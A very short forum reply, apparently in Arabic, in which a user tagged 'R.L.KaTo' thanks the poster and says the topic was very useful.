[R.L.KaTo]

مشكور جدا موضوع فعلا استفدنا منه كتير